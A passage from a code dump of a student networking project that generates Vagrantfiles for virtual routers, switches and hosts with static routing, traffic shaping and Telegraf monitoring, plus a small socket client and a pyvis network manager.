\\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n if Id == 4:\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Installation of Web-Server\\\"\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install -y apache2\\n\")\n f.write(\"echo \\\"Web-ServerServer is installed and Runing\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f, Router, edges, network):\n\n Id = Router[\"id\"]\n Name = Router[\"label\"]\n Os = Router[\"vm_image\"]\n Ram = Router[\"ram\"]\n N_Cpus = Router[\"n_cpus\"]\n\n Ip1 = Router[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Router[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Router[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Router[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n Ip2 = Router[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Router[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Router[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Router[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n CustomScript = Router[\"custom_script\"]\n\n if Id == 1: \n tag = \"1\"\n if Id == 2: \n tag = \"2\" \n\n IpRouter2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter2 = ipcalc.Network(IpRouter2)\n IpNetRouter2 = str(NetworkRouter2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpRouter1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter1_1 = ipcalc.Network(IpRouter1_1)\n IpNetRouter1_1 = str(NetworkRouter1_1.network())\n \"\"\"\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network())\n \n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network())\n \n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n GatewaySwitch = network[2][\"network_interfaces\"][2][\"ip_address\"]\n GatewaySwitch = GatewaySwitch.split(\"/\")[0]\n\n GatewayRouter1 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n GatewayRouter1 = GatewayRouter1.split(\"/\")[0]\n\n GatewayRouter2 = network[1][\"network_interfaces\"][1][\"ip_address\"]\n GatewayRouter2 = GatewayRouter2.split(\"/\")[0]\n\n f.write(\"config.vm.define \\\"\" + Name+ \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub1 + \"\\\", netmask: \\\"\" + Netmask1 + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-\" + tag + \"\\\", auto_config: true\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub2 + \"\\\", netmask: \\\"\" + Netmask2 + \"\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n if Id == 1: \n f.write(\"sudo route add -net \" + IpRouter2 + \" netmask \" + NetmaskRouter2 + \" gw \" + GatewayRouter2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewaySwitch + \" dev \" + Interface1 + \"\\n\")\n if Id == 2: \n f.write(\"sudo route add -net \" + IpRouter1_1 + \" netmask \" + NetmaskRouter1_1 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewayRouter1 + \" dev \" + Interface2 + \"\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n#this function write in the vagrant file a new Router\ndef writeSwitch(f, Switch, edges, network):\n\n Id = Switch[\"id\"]\n Name = Switch[\"label\"]\n Ram = Switch[\"ram\"]\n N_Cpus = Switch[\"n_cpus\"]\n Os = Switch[\"vm_image\"]\n CustomScript = Switch[\"custom_script\"]\n\n IpA = Switch[\"network_interfaces\"][0][\"ip_address\"]\n NetmaskA = Switch[\"network_interfaces\"][0][\"netmask\"]\n InterfaceA = Switch[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReferenceA = Switch[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidthA = 0\n DownlinkBandwidthA = 0\n for edge in edges:\n if EdgeReferenceA[0] == edge[\"from\"] and EdgeReferenceA[1] == edge[\"to\"]:\n UplinkBandwidthA = edge[\"bandwidth_up\"]\n DownlinkBandwidthA = edge[\"bandwidth_down\"]\n\n IpB = Switch[\"network_interfaces\"][1][\"ip_address\"]\n NetmaskB = Switch[\"network_interfaces\"][1][\"netmask\"]\n InterfaceB = Switch[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReferenceB = Switch[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidthB = 0\n DownlinkBandwidthB = 0\n for edge in edges:\n if EdgeReferenceB[0] == edge[\"from\"] and EdgeReferenceB[1] == edge[\"to\"]:\n UplinkBandwidthB = edge[\"bandwidth_up\"]\n DownlinkBandwidthB = edge[\"bandwidth_down\"]\n\n IpSW = Switch[\"network_interfaces\"][2][\"ip_address\"]\n NetmaskSW = Switch[\"network_interfaces\"][2][\"netmask\"]\n InterfaceSW = Switch[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReferenceSW = Switch[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidthSW = 0\n DownlinkBandwidthSW = 0\n for edge in edges:\n if EdgeReferenceSW[0] == edge[\"from\"] and EdgeReferenceSW[1] == edge[\"to\"]:\n UplinkBandwidthSW = edge[\"bandwidth_up\"]\n DownlinkBandwidthSW = edge[\"bandwidth_down\"]\n\n Gateway = network[0][\"network_interfaces\"][0][\"ip_address\"]\n Gateway = Gateway.split(\"/\")[0]\n\n IpRouter2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter2 = ipcalc.Network(IpRouter2)\n IpNetRouter2 = str(NetworkRouter2.network())\n \n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpRouter1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskRouter1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkRouter1_2 = ipcalc.Network(IpRouter1_2)\n IpNetRouter1_2 = str(NetworkRouter1_2.network())\n \"\"\"\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n \"\"\"\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[0][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_\" + network[1][\"label\"] + \"\\\", auto_config: false\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\n f.write(\"apt-get update\\n\")\n f.write(\"apt-get install -y tcpdump\\n\")\n f.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\n f.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\n f.write(\"sudo ovs-vsctl add-br SW1\\n\")\n f.write(\"sudo ovs-vsctl add-br HA\\n\")\n f.write(\"sudo ovs-vsctl add-br HB\\n\")\n f.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\n f.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\n f.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\n f.write(\"echo \\\"Bridge configuration END\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\n f.write(\"sudo ifconfig SW1 \" + IpSW + \"\\n\")\n f.write(\"sudo ifconfig HA \" + IpA + \"\\n\")\n f.write(\"sudo ifconfig HB \" + IpB + \"\\n\")\n f.write(\"sudo ifconfig SW1 up\\n\")\n f.write(\"sudo ifconfig HA up\\n\")\n f.write(\"sudo ifconfig HB up\\n\")\n f.write(\"sudo ifconfig eth1 up\\n\")\n f.write(\"sudo ifconfig eth2 up\\n\")\n f.write(\"sudo ifconfig eth3 up\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + IpRouter2 +\" netmask \" + NetmaskRouter2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n f.write(\"sudo route add -net \" + IpRouter1_2 +\" netmask \" + NetmaskRouter1_2 + \" gw \" + Gateway + \" dev \" + InterfaceSW + \"\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidthA > 0 or DownlinkBandwidthA > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceA)\n if DownlinkBandwidthA > 0:\n f.write(' -d ' + str(DownlinkBandwidthA))\n if UplinkBandwidthA > 0:\n f.write(' -u ' + str(UplinkBandwidthA))\n f.write('\\n')\n\n if UplinkBandwidthB > 0 or DownlinkBandwidthB > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceB)\n if DownlinkBandwidthB > 0:\n f.write(' -d ' + str(DownlinkBandwidthB))\n if UplinkBandwidthB > 0:\n f.write(' -u ' + str(UplinkBandwidthB))\n f.write('\\n')\n \n if UplinkBandwidthSW > 0 or DownlinkBandwidthSW > 0:\n f.write('sudo ./wondershaper -a ' + InterfaceSW)\n if DownlinkBandwidthSW > 0:\n f.write(' -d ' + str(DownlinkBandwidthSW))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidthSW))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\"+ Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram +\"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n \n \n\n \n\n\n\n\"\"\"\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (1,{\n \"Id\" : 1,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost2 = (2,{\n \"Id\" : 2,\n \"Name\":\"host2\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.12.5/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost3 = (3,{\n \"Id\" : 3,\n \"Name\":\"host3\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.5/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (4,{\n \"Id\" : 4,\n \"Name\": \"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.3.5/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.9/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nrout2 = (5,{\n \"Id\" : 5,\n \"Name\":\"router2\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.10/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.10/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nswitch1 = (6,{\n \"Id\" : 6,\n \"Name\":\"switch1\",\n \"Type\": \"Switch\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HA\"\n },{\n \"Ip\": \"172.16.12.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HB\"\n },{\n \"Ip\": \"172.16.3.2/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"SW1\"\n }]\n})\n\nfakeNet = [host1,host2,host3,rout1,rout2,switch1]\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"router\":\n writeRouter(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"switch\":\n writeSwitch(VagrantFile, node, edges, nodes)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges, nodes) \n VagrantFile.write('end\\n')\n VagrantFile.close()\n\n\n #read the data structure from input\n #Network = G.nodes.data():\n #Network = fakeNet\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n\n #first, let's write the beginnig of the VagrantFile\n #BeginVagrantFile(VagrantFile,Network)\n\n\n #second, let's write each device with his feature\n #this topology has 3 hosts, 1 switch and 3 routers\n #for device in Network:\n #call the respective function to \"populate\" the vagrant file\n # typeOfDevice = device[1][\"Type\"]\n # print(\"the device is a \" + typeOfDevice)\n\n # if typeOfDevice is \"Router\":\n # writeRouter(VagrantFile,device,Network)\n\n #for device in Network:\n #call the respective function to \"populate\" the vagrant file\n # typeOfDevice = device[1][\"Type\"]\n # print(\"the device is a \" + typeOfDevice)\n # if typeOfDevice is \"Switch\":\n # writeSwitch(VagrantFile,device,Network)\n\n\n #for device in Network:\n #call the respective function to \"populate\" the vagrant file\n # typeOfDevice = device[1][\"Type\"]\n # print(\"the device is a \" + typeOfDevice)\n # if typeOfDevice is \"Host\":\n # writeHost(VagrantFile,device,Network)\n\n\n"
},
{
"alpha_fraction": 0.677859365940094,
"alphanum_fraction": 0.7040923237800598,
"avg_line_length": 24.105262756347656,
"blob_id": "5d00a768e5ec92aab4d036a8f54929be33f0f597",
"content_id": "cc10ff4f2dbae1357394bea78f0c48ddf4d72156",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 953,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 38,
"path": "/Server and Client/oldstuff/client.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import socket\nimport psutil #this import was added by luca\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\nSERVER = \"192.168.53.133\"\nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\ndef send(msg):\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n send_length += b' ' * (HEADER - len(send_length))\n client.send(send_length)\n client.send(message)\n print(client.recv(2048).decode(FORMAT))\n\n#this function return the percentage of RAM in use by the machine\ndef Ram_data_perc():\n return (psutil.virtual_memory().available * 100 / psutil.virtual_memory().total)\n\n#this function return the percentage of CPU in use by the machine\ndef Cpu_data_perc():\n return (psutil.cpu_percent()) \n\n\nsend(\"Hello World!\")\ninput()\nsend(\"Hello Everyone!\")\ninput()\nsend(\"Hello uzair!\")\n\nsend(DISCONNECT_MESSAGE)"
},
{
"alpha_fraction": 0.5451778769493103,
"alphanum_fraction": 0.5517321825027466,
"avg_line_length": 31.86153793334961,
"blob_id": "9fb8c15523bb1b51f2706e315bd5b4e77af37255",
"content_id": "e48905e326549c5476c257bdf2a7816d0f5ce943",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4272,
"license_type": "permissive",
"max_line_length": 269,
"num_lines": 130,
"path": "/network_core.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "\"\"\" _____________________________________________________________\n\n Description: Network entity manager code\n Author: Giuseppe Superbo ([email protected])\n Date: Winter 2020-2021\n Course: Design of Networks and Communication Systems\n _____________________________________________________________\n\"\"\"\n\nfrom pyvis.network import Network\nimport json\nimport os\n\n\ndef create_network():\n \"\"\"Function that creates an empty network.\n\n Parameters:\n - network_name: name of the network\n \n Returns:\n - G: network object\n\n \"\"\"\n G = Network()\n return G\n\ndef open_network(network_path):\n \"\"\"Function that imports a network from an html file.\n\n Parameters:\n - network_path: path of the network to be imported\n \n Returns:\n - G: network object\n\n \"\"\"\n G = Network()\n html = open(network_path, \"r\")\n lines_html = html.readlines()\n nodes = \"\"\n edges = \"\"\n\n for line in lines_html:\n if \"nodes = new\" in line:\n nodes = json.loads(line.split('(')[1].split(')')[0])\n if \"edges = new\" in line:\n edges = json.loads(line.split('(')[1].split(')')[0])\n \n dictionary_to_nodes(nodes, G)\n dictionary_to_edges(edges, G)\n\n G.save_graph(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n\n html_fix(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n\n return G\n \n\ndef dictionary_to_nodes(dictionary, network):\n \"\"\"Procedure that adds new nodes to a network by parsing a dictionary\n\n Parameters:\n - dictionary: dictionary that contains the new nodes;\n - network: network to be updated.\n\n \"\"\"\n for node in dictionary:\n network.add_node(node[\"id\"], image=node[\"image\"], label=node[\"label\"], shape=node[\"shape\"], type=node[\"type\"], network_interfaces=node[\"network_interfaces\"], vm_image=node[\"vm_image\"], ram=node[\"ram\"], n_cpus=node[\"n_cpus\"], custom_script=node[\"custom_script\"])\n\n\ndef dictionary_to_edges(dictionary, network):\n \"\"\"Procedure that adds new edges to a network by parsing a dictionary\n\n Parameters:\n - dictionary: dictionary that contains the new edges;\n - network: network to be updated.\n\n \"\"\"\n for edge in dictionary:\n network.add_edge(edge[\"from\"],edge[\"to\"], bandwidth_up=edge[\"bandwidth_up\"], bandwidth_down=edge[\"bandwidth_down\"])\n\ndef nodes_search_type(network, search_type):\n \"\"\"Function that returns only a specific type of nodes of a network\n\n Parameters:\n - search_type: type of nodes that should be returned;\n - network: network as source.\n\n Returns:\n - result: dictionary that contains the result of the search.\n \"\"\"\n nodes = network.nodes\n result = []\n for node in nodes:\n if search_type == \"others\":\n if node[\"type\"] not in [\"router\", \"host\", \"switch\"]:\n result.append(node)\n elif node[\"type\"] == search_type:\n result.append(node)\n return result\n \n\ndef html_fix(html_path):\n \"\"\"Procedure that fixes the css style of the network graph visualization\n\n Parameters:\n - html_path: absolute path of the html to be fixed\n \"\"\"\n old_html = open(os.path.abspath(html_path), \"r\")\n lines = old_html.readlines()\n old_html_data = old_html.read()\n old_html.close()\n new_html = open(os.path.abspath(html_path), \"w\")\n for line in lines:\n if line.strip(\"\\n\") != \"<center>\" and line.strip(\"\\n\") != \"<h1>None</h1>\" and line.strip(\"\\n\") != \"</center>\":\n if line.strip(\"\\n\") == \" width: 500px;\":\n new_html.write(' width: 990px;\\n')\n continue\n if line.strip(\"\\n\") == \" height: 500px;\":\n new_html.write(' height: 600px;\\n')\n continue\n if line.strip(\"\\n\") == \" position: relative;\":\n new_html.write(' position: center;\\n')\n continue\n if line.strip(\"\\n\") == \" border: 1px solid lightgray;\":\n new_html.write(\" border: 0px solid lightgray;\\n\")\n continue\n new_html.write(line)\n new_html.close()\n"
},
{
"alpha_fraction": 0.6019653677940369,
"alphanum_fraction": 0.6765236258506775,
"avg_line_length": 52.30769348144531,
"blob_id": "e6ba7b7c35db4eb9dd9ed65aa4c4c3f4acf08cd4",
"content_id": "daedf639bf41b06a9af9d3e8ab26850b8366dff4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11092,
"license_type": "permissive",
"max_line_length": 235,
"num_lines": 208,
"path": "/fromHTMLtoVagrant/OldScripts/VagrantScriptCreatorInTextFormat.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\n\n\n# In[24]:\n\n\n## Our motive is to generate only one single vagrant file.##\n## we will try to make a generic file as much as possible. since it's a test-based project/not a production based##\n## we will allow our user's limited choices to selects the combinations. So, things will not get complicated either for the user either for us.##\n## for example we only allow users to give the IP addresses.##\n## VM topologies will already be defined and created you can see the given topology below.\n\nf = open(\"vagrant.txt\", \"w\")\nf.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\nf.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\nf.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\nf.write(\"config.vm.box_check_update = true\\n\")\nf.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.cpus = 1\\n\")\nf.write(\"end\\n\")\n#######################################################################################\n\n## we can give the user right to change the Virtual machine name as they wanted. But it's optional, not mandatory.\n\n#vm = input(\"Enter your VM name:\")\n#f.write(\"config.vm.define\" \" \" + vm)\nf.write(\"config.vm.define \\\"router-1\\\" do |router1|\\n\")\nf.write(\"router1.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router1.vm.hostname = \\\"router-1\\\"\\n\")\n# User can selecte the desire IP addresses according to the requirements.\nf.write(\"router1.vm.network \\\"private_network\\\", ip: \\\"172.16.3.5\\\", netmask: \\\"255.255.255.240\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", ip: \\\"172.16.4.9\\\",netmask: \\\"255.255.255.252\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\nf.write(\"router1.vm.provision \\\"shell\\\", 